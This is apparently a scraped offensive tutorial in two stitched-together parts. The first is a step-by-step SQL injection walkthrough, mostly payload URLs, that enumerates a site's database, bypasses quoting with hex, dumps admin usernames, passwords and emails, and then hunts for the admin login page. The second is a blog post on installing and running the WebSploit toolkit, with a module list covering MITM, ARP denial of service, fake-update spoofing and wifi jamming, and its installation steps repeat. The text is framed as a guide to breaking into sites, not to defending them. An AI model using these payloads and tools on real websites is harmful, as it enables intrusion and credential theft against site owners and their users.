If we want to use commands and get results we must know how many columns there are on a website.

To find the number of columns we write a query with incrementing values until we get an error, like this:

Code:

http://www.thesite.com/page.php?id=1 ORDER BY 1-- <---No error

http://www.thesite.com/page.php?id=1 ORDER BY 2-- <---No error

http://www.thesite.com/page.php?id=1 ORDER BY 3-- <---No error

http://www.thesite.com/page.php?id=1 ORDER BY 4-- <---No error

http://www.thesite.com/page.php?id=1 ORDER BY 5-- <---ERROR!

This means that there are four columns!

DON'T FORGET TO INCLUDE THE DOUBLE NULL (--) AFTER THE QUERY.

VERY IMPORTANT!

Finding which columns are vulnerable

So we know that there are four columns now we have to find out which ones are vulnerable to injection. To do
this we will use the UNION and SELECT queries while keeping the double null (--) at the end of the string.

Code:

http://www.thesite.com/page.php?id=-1 UNION SELECT 1,2,3,4--

Don't forget to put the extra null(-) in between the "=" sign and the value (the number).
page.php?id=-1

Now after entering that query you should be able to see some numbers somewhere on the page that seem out of
place. Those are the numbers of the columns that are vulnerable to injection. We can use those columns to pull
information from the database which we will see in Part Two.

Part Two - Gathering Information

In this part we will discover how to find the name of the database and what version of SQL the website is
using by using queries to exploit the site.

Determining the SQL version.

Finding the version of the SQL of the website is a very important step because the steps you take for version 4
are quite different from version 5 in order to get what you want. In this tutorial, I will not be covering version
4.

If we look back to the end of Part One we saw how to find the vulnerable columns. Using that information we
can put together our next query (I will be using column 2 as an example). The command should look like this:

Code:

http://www.thesite.com/page.php?id=-1 UNION SELECT 1,@@version,3,4--

Because 2 is the vulnerable column, this is where we will place "@@version". Another string that could
replace "@@version" is "version()".

If the website still does not display the version try using unhex(hex()) which looks like this:

Code:

http://www.thesite.com/page.php?id=-1 UNION SELECT 1,unhex(hex(@@version)),3,4--

NOTE: If this method is used here, it must be used for the rest of the injection as well.

Now what you want to see is something along these lines:

Code:

5.1.44-community-log

Which is the version of the SQL for the website.

NOTE: If you see version 4 and you would like to have a go at it, there are other tutorials that explain how to
inject into it.

Finding the database

To find the database we use a query like the one below:

Code:

http://www.thesite.com/page.php?id=-1 UNION SELECT 1,group_concat(schema_name),3,4 from

information_schema.schemata--

This could sometimes return more results than necessary and so that is when we switch over to this query
instead:

Code:

http://www.thesite.com/page.php?id=-1 UNION SELECT 1,concat(database()),3,4--

You now have the name of the database! Congratulations. Copy and paste the name somewhere safe, we'll
need it for later.
Part Three - The Good Part

This is the fun part where we will find the usernames, emails and passwords!

Finding the table names

To find the table names we use a query that is similar to the one used for finding the database with a little bit
extra added on:

Code:

http://www.thesite.com/page.php?id=-1 UNION SELECT 1,group_concat(table_name),3,4 FROM

information_schema.tables WHERE table_schema=database()--

It may look long and confusing but once you understand it, it really isn't so. What this query does is it "groups"
(group_concat) the "table names" (table_name) together and gathers that information "from" (FROM)
information_schema.tables where the "table schema" (table_schema) can be found in the "database"
(database()).

NOTE: While using group_concat you will only be able to see 1024 characters worth of tables so if you notice
that a table is cut off on the end switch over to limit which I will explain now.

Code:

http://www.thesite.com/page.php?id=-1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables

WHERE table_schema=database() LIMIT 0,1--

What this does is it shows the first and only the first table. So if we were to run out of characters on let's say
the 31st table we could use this query:

Code:

http://www.thesite.com/page.php?id=-1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables

WHERE table_schema=database() LIMIT 30,1--

Notice how my limit was 30,1 instead of 31,1? This is because when using limit is starts from 0,1 which means
that the 30th is actually the 31st Tongue

You now have all the table names!

Finding the column names

Now that you have all of the table names try and pick out the one that you think would contain the juicy
information. Usually they're tables like User(s), Admin(s),

tblUser(s) and so on but it varies between sites.

After deciding which table you think contains the information, use this query (in my example, I'll be using the
table name "Admin"):

Code:

http://www.thesite.com/page.php?id=-1 UNION SELECT 1,group_concat(column_name),3,4 FROM

information_schema.columns WHERE table_name="Admin"--

This will either give you a list of all the columns within the table or give you an error but don't panic if it is
outcome #2! All this means is that Magic Quotes is turned on. This can be bypassed by using a hex or char
converter (they both work) to convert the normal text into char or hex.

UPDATE: If you get an error at this point all you must do is follow these steps:

1. Copy the name of the table that you are trying to access.

2. Paste the name of the table into this website where it says "Say Hello To My Little Friend".

Hex/Char Converter
http://www.swingnote.com/tools/texttohex.php

3. Click convert.

4. Copy the string of numbers/letters under Hex into your query so it looks like this:

Code:

http://www.thesite.com/page.php?id=-1 UNION SELECT 1,group_concat(column_name),3,4 FROM

information_schema.columns WHERE table_name=0x41646d696e--

Notice how before I pasted the hex I added a "0x", all this does is tells the server that the following characters
are part of a hex string.

You should now see a list of all the columns within the table such as username, password, and email.

NOTE: Using the limit function does work with columns as well.

Displaying the column contents

We're almost done! All we have left to do is to see what's inside those columns and use the information to
login! To view the columns we need to decide which ones we want to see and then use this query (in this
example I want to view the columns "username", "password", and "email", and my database name will be
"db123"). This is where the database name comes in handy:

Code:

http://www.thesite.com/page.php?id=-1 UNION SELECT

1,group_concat(username,0x3a,password,0x3a,email),3,4 FROM db123.Admin--

In this query, 0x3a is the hex value of a colon ( which will group the username:password:email for the
individual users just like that.
FINALLY! Now you have the login information for the users of the site, including the admin. All you have to
do now is find the admin login page which brings us to Section Four.

Finding the admin page

Usually the admin page will be directly off of the site's home page, here are some examples:

Code:

http://www.thesite.com/admin

http://www.thesite.com/adminlogin

http://www.thesite.com/modlogin

http://www.thesite.com/moderator

Once again there are programs that will find the page for you but first try some of the basic guesses, it might
save you a couple of clicks. If you do use a program

Reiluke has coded one for that as well. Search Admin Finder by Reiluke.

And that conlcudes my tutorial! I hope it was helpful to some of you. Remember to keep practicing and
eventually you'll have all of the queries memorized in no time! 

HOW TO USE WEBSPLOIT?

Posted by Nirav Desai at 7:41 PM Labels: hacking tools, metasploit, website hack, websploit 0 comments

Hey here is new tools which I found is WEBSPLOIT. First download WEBSPLOIT
from here.Now install it. (it`s old article; view updated part at bottom to download
latest version)
Installation process are as follow.

(1)First download WebSploit toolkit 

(2)Now unzip the file folder 
(3)Now change the permission of WebSploit file in WebSploit folder. Right click on
websploit file and select properties.
(4)Select the Permission tab and click on Allow executing file as program now  click
on close
(5)now open your terminal & type
    cd /Downloads/web/websploit
    ./websploit

Now open terminal and type websploit.

HOW TO USE WEBSPLOIT?

Hey here is new tools which I found is WEBSPLOIT. First download WEBSPLOIT
from here.Now install it. (it`s old article; view updated part at bottom to download
latest version)

Installation process are as follow.

(1)First download WebSploit toolkit 
(2)Now unzip the file folder 
(3)Now change the permission of WebSploit file in WebSploit folder. Right click on
websploit file and select properties.
(4)Select the Permission tab and click on Allow executing file as program now  click
on close
(5)now open your terminal & type
    cd /Downloads/web/websploit
    ./websploit

Now open terminal and type websploit.

Now type show modules.

Web Modules Description

------------------- ---------------------
web/apache_users Scan Directory Of Apache Users
web/dir_scanner Directory Scanner
web/wmap Information Gathering From Victim Web Using (Metasploit Wmap)
web/pma PHPMyAdmin Login Page Scanner
Network Modules Description
------------------- ---------------------
network/arp_dos ARP Cache Denial Of Service Attack
network/mfod Middle Finger Of Doom Attack
network/mitm Man In The Middle Attack
network/mlitm Man Left In The Middle Attack
network/webkiller TCP Kill Attack
network/fakeupdate Fake Update Attack Using DNS Spoof
network/fakeap Fake Access Point
Exploit Modules Description
------------------- ---------------------
exploit/autopwn Metasploit Autopwn Service
exploit/browser_autopwn Metasploit Browser Autopwn Service
exploit/java_applet Java Applet Attack (Using HTML)
Wireless Modules Description
------------------- ---------------------
wifi/wifi_jammer Wifi Jammer
wifi/wifi_dos Wifi Dos Attack

This are attacks available in this toolkit. But for some attacks metasploit is necessary.
For example if you want to find php admin page then type
use web/pma

now type show options. it`s show next step. So now type 
set target “website url”
now at last type 
run 
& wait. It will find admin page of php website.

As I mention above you can use all options which are available in modules.

Update:
Now websploit is moved to github .So download and update instruction are as follow.

git clone https://github.com/websploit/update.git

cd update

chmod +x websploit 

./websploit

For update of framework:-

cd update

git pull
You can also run update command in websploit.